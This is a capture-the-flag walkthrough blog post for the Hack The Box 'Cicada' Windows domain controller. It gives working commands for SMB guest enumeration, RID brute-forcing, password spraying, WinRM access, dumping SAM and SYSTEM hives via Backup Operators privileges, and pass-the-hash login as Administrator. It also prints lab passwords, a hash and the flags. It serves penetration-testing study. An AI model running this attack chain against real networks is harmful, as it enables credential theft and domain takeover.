Cicada


IP: 10.129.64.6
Let’s start with the nmap scan.
nmap -sC -sV -o nmap 10.129.64.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 11:12 IST
Nmap scan report for 10.129.64.6
Host is up (0.17s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-15 12:43:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-15T12:43:42
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.95 seconds
We have a lot of interesting ports open from which we can likely assume it’s a Windows domain controller.
Also, we can see cicada.htb
it being mentioned many times, so let’s first add it to our hosts file.
sudo nano /etc/hosts
As SMB supports more guest authentication so let’s start with enumerating shares.
nxc smb 10.129.64.6 --shares
We get an error that the user session is deleted, so let’s specify a non-existing user with an empty password and see if guest authentication is allowed on it or not.
nxc smb 10.129.64.6 -u "dignitas" -p "" --shares
We have two new shares DEV
and HR
and we also have READ access on HR
share.
smbclient -U 'dignitas' //10.129.64.6/HR
So, we have a Notice from HR file, let’s get that to our machine and see the contents of it.
mget *.txt
cat Notice\ from\ HR.txt
We’ve been provided with a default password here Cicada$M6Corpb*@Lp#nZp!8
But we’re unaware of the users.
As we have guest authentication, we can do RID brute-forcing to bruteforce the user id’s from 0-4000.
nxc smb 10.129.64.6 -u "dignitas" -p "" --rid-brute
We got some users, so let’s add that to our list and then start with the password spray.
nxc smb 10.129.64.6 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
The password is valid for michael.wrightson
. Let’s enumerate and see if this user has access to DEV
share.
nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
Michael doesn’t have any additional share access beyond what the guest user has. Now with LDAP access, we can look for a more complete list of users.
nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
We have 8 local users, but the interesting thing is that the user david.orelious
has a comment that spills his password aRt$Lp#7t*VQ!3
Let’s now check the access to the DEV
Share again.
nxc smb 10.129.64.6 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
Let’s look at the contents inside the DEV
share.
smbclient -U 'cicada/david.orelious%aRt$Lp#7t*VQ!3' //10.129.64.6/DEV
We have a file name Backup_script.ps1
. Let’s download it to our machine and see what we have in there.
mget *.ps1
cat Backup_script.ps1
So, we have the password for emily.oscars
i.e. Q!3@Lp#M6b*7t*Vt
. Let’s see if the creds are valid for WinRM.
nxc winrm 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Let’s now connect using evil-winrm
.
evil-winrm -i 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Let’s now get our first flag.
type C:\Users\emily.oscars.CICADA\Desktop\user.txt
Flag: 2b8a749011d596957ba7c3159c1ea4a5
Let’s now move to the root. Checking the privileges of Emily user.
net user emily.oscars
Emily is a member of Backup Operators
group.
According to Microsoft docs,this group:
Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. Members of the following groups can modify Backup Operators group membership: default service Administrators, Domain Admins in the domain, and Enterprise Admins. Members of the Backup Operators group can’t modify the membership of any administrative groups. Although members of this group can’t change server settings or modify the configuration of the directory, they do have the permissions needed to replace files (including operating system files) on domain controllers. Because members of this group can replace files on domain controllers, they’re considered service administrators.
This shows up in the form of the SeBackupPrivilege
and SeRestorePrivilege
whoami /priv
Let’s now dump the registry hives to files and exfiltrate them.
reg save hklm\sam sam
reg save hklm\system system
reg save hklm\security security
download sam
download system
Let’s now dump the hashes.
impacket-secretsdump -sam sam -system system LOCAL
We got the Administrator hash, let’s use that to log in.
evil-winrm -i 10.129.64.6 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Let’s get our root flag now.
type C:\Users\Administrator\Desktop\root.txt
Flag: 8f272a073990777e7c9a3798de37b2d3
Subscribe to my newsletter
Read articles from REHAN SAYYED directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

REHAN SAYYED
REHAN SAYYED
Passionate cybersecurity enthusiast and red teamer, exploring the depths of offensive security. From secure code reviews to red team operations, I share insights, strategies, and hands-on experiences to help others dive into the world of cyber offense. Join me as I navigate the complexities of cybersecurity on my journey to professional red teaming.